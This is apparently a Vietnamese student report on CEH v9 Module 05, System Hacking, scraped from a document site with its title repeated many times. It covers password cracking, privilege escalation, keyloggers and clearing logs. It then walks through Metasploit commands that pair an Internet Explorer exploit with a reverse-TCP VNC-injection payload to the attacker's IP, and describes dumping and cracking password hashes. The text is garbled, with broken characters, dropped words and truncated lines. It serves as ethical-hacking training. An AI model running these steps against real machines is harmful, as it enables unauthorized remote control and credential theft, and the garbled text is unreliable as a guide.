Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9 Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9 Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9 Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9 Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9 Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9 Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9 Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9
SYSTEM HACKING MODULE 05 Theo thống kê công ty BKAV, từ đầu năm 2013 đến nay, Việt Nam có 2.405 website quan, doanh nghiệp bị xâm nhập, trung bình tháng có khoảng 300 website bị công Hiện nay, thiết bị máy tính PC, laptop, có kết nối mạng nội kết nối Internet Trên thiết bị này, hầu hết cài đặt phần mềm ứng dụng IE, Microsoft Office, Adobe Reader, Và chạy hệ điều hành Windows XP, Windows 7, GIỚI THIỆU Giới thiệu system hacking Gồm kỹ thuật lấy username, password dựa vào phần mềm cài hệ thống dịch vụ từ xa hệ điều hành windows Nâng quyền hệ thống, sử dụng keyloger để lấy thơng tin, xóa log file hệ thống Hacker thực thứ máy tính đó, gây hậu vô nghiêm trọng cho cá nhân, tổ chức 1, Xuất lỗ hổng bị khai thác cơng nghệ CÁC LỖ HỔNG THƯỜNG KHAI THÁC TRONG HỆ có 2, Kể công phát lỗ hổng 3, Kẻ tiến hành viết phát tán công cụ khai thác lỗ hổng này, 4, Hãng sản xuất đồng thời phát lỗi tìm cách sửa chữa ĐIỀU HÀNH WINDOWS 5, Lỗ hổng công bố CÁC LỖ HỔNG THƯỜNG KHAI THÁC TRONG HỆ 6, Các phần mềm Anti-virus cập nhật thông tin để phát có Đoạn mã tìm cách khai thác lỗ hổng 7, Hãng sản xuất hoàn thành vá 8, Hãng hoàn tất phát hành vá lỗi đến tất khách hàng ĐIỀU HÀNH WINDOWS Q TRÌNH TẤN CƠNG VÀO MỘT HỆ THỐNG Trích tất thơng tin user hệ thống Dùng phương pháp thăm dò hữu ích để có thơng tin hữu ích, xác Bẻ khóa mật đăng nhập user cách khác, mục tiêu phải đạt tới quyền truy cập vào hệ thống Chuyển đổi giới hạn truy cập từ user bình thường lên admin user có quyền cao đủ cho cơng Thực thi ứng dụng hệ thống máy đích Chuẩn bị trước malware, keylogger, để chạy máy tính công Những file thực thi, file sourcecode chạy chương trình, Cần phải làm ẩn đi, tránh bị mục tiêu phát tiêu diệt Những thơng tin có liên quan đến bạn cần phải bị xóa sạch, khơng để lại thứ Nếu khơng khả bạn bị phát kẻ đột nhập cao Q TRÌNH TẤN CƠNG VÀO MỘT HỆ THỐNG Tóm lại, q trình cơng hệ thống (System hacking) bước sau trình khảo sát, thu thập thông tin mục tiêu cần công kỹ thuật thư Footprinting, Social engineering, Enumeration, Google Hacking áp dụng cho mục đích truy tìm thơng tin Trong Modul Chúng thực lab chủ đề Systems Hacking (Tấn công hệ thống) Đây nghệ thuật để kiểm tra máy tính hệ thống mạng máy tính nhằm xác định lỗ hổng điểm yếu bảo mật mà Attacker Hacker cơng đột nhập vào Một chủ đề Systems Hacking cơng mật (Password Hacking) xem bước dễ thơng dụng mà Attacker đoạt quyền truy cập trái phép vào máy tính hay mạng máy tính Mặc dù mật mạnh khó Crack (Bẻ khóa) ĐƠI NÉT VỀ systems hacking Tuy nhiên đa số người dùng, chuyên gia bảo mật nhà quản trị hệ thống đương nhiên người sử dụng thường xuyên đặt mặt yếu Điều làm cho cơng cụ bẻ khóa mật có nhiều ngày dễ dàng phá mật Giúp cho Attacker thâm nhập vào hệ thống ĐÔI NÉT VỀ systems hacking Và sau Hacker thâm nhập vào hệ thống thông qua mật bẻ khóa hacker cài cắm chương trình đánh cắp liệu, mở cổng hậu để truy cập vào lần sau sử dụng máy tính bị công làm bàn đạp để công tồn hệ thống mạng Các chủ đề chương là, biết cách giám sát từ xa che dấu tập tin, trích xuất tập tin che dấu, giám sát hệ thống từ xa,… mà cần qua Mục tiêu Systems Hacking là: Đoạt quyền truy cập Leo thang đặc quyền Thực thi ứng dụng Che dấu hành động, file thơng qua việc xóa dấu vết ĐƠI NÉT VỀ systems hacking - VNC (Virtual Network Computing) công nghệ kĩ thuật dung để chia sẻ giao diện hình từ xa (remote desktop sharing) VNC giúp người dung hiển thị hình máy tính hệ thống xa hình máy tính local người dung điều khiển thao tác qua kết nối mạng Đồng nghĩa với việc đó, VNC cho phép kẻ cơng truy cập từ xa kiểm sốt máy tính nhắm mục tiêu từ máy tính thiết bị di động khác, họ đâu giới Giới thiệu - Ở đây, thấy kẻ cơng khai thác lỗ hổng hệ thống mục tiêu để thiết lập VNC trái phép điều khiển mục tiêu từ xa Mục tiêu phòng thí nghiệm giúp học cách khai thác lỗ hổng máy đích thiết lập kết nối VNC Metasploit dự án bảo mật máy tính cung cấp thơng tin vấn đề lỗ hổng bảo mật giúp đỡ kiểm tra thâm nhập phát triển hệ thống phát cơng mạng Metasploit chạy hầu hết hệ điều hành: Linux, Windows, MacOS Mục tiêu lab Các bước thực 1, Mở terminal Linux chạy dòng lệnh: msfconsole để chạy Metasploit Các bước thực 2, Tìm kiếm khai thác sở liệu Metasploit Privilege Gõ lệnh: search ms11 nhấn Enter Lệnh hiển thị khai thác có sẵn sở liệu Metasploit ! Msfconsole bao gồm chức tìm kiếm dựa biểu thức quy mở rộng Nếu có ý tưởng chung tìm kiếm, bạn tìm kiếm thơng qua “search“ Các bước thực 3, Gõ lệnh : use exploit/windows/browser/ms11_003_ie_css_import and press Enter Các bước thực 4, Gõ lệnh: set payload windows/vncinjec/resverse_tcp and press Enter Các bước thực 4, Gõ lệnh: show options and press Enter => Để kiểm tra tùy chọn có sẵn khai thác Các bước thực 5, Như ảnh ta thấy LHOST không set LPORT mặc định port number Bây cần set LHOST LPORT Các bước thực 4, Setting LHOST and LPORT - Type set: LHOST [attacker machine IP address] and press Enter + Trong lab, địa IP Kali Linux machine là: 192.168.0.126 Các bước thực 4, Setting LHOST and LPORT - To set local port, type: set LPORT 443 and presses Enter To set LHOST, type: set LHOST 192.168.0.126 Các bước thực Tiến hành kiểm tra việc thiết đặt, type : show options Các bước thực 5, Running Exploit - Type: exploit and press Enter để chạy exploit Các bước thực 5, Running Exploit - Bây giờ, chuyển sang cửa sổ mở trình khám phá internet: sau chép địa IP cục http://192.168.0.126:8080/2bDUHew3o3o1I61 - là: khứ nằm địa ... qua Mục tiêu Systems Hacking là: Đoạt quyền truy cập Leo thang đặc quyền Thực thi ứng dụng Che dấu hành động, file thơng qua việc xóa dấu vết ĐÔI NÉT VỀ systems hacking Bài Dumping... Windows Server 2012 Các bước thực 1, - Mở folder CEHv9 Module 05 System Hacking, chọn đường dẫn đến folder Winrtgen - Double click vào chương trình winrtgen ta sau: Các bước thực 2, Click chọn Add... CEHv9 Module 05 System Hacking , chọn đường dẫn đến folder RainbowCrack - Double click vào chương trình rcrack_gui ta sau: Các bước thực 5, - Mở file Hasht.txt mà trích xuất từ PWDUMP7 - Tiến hành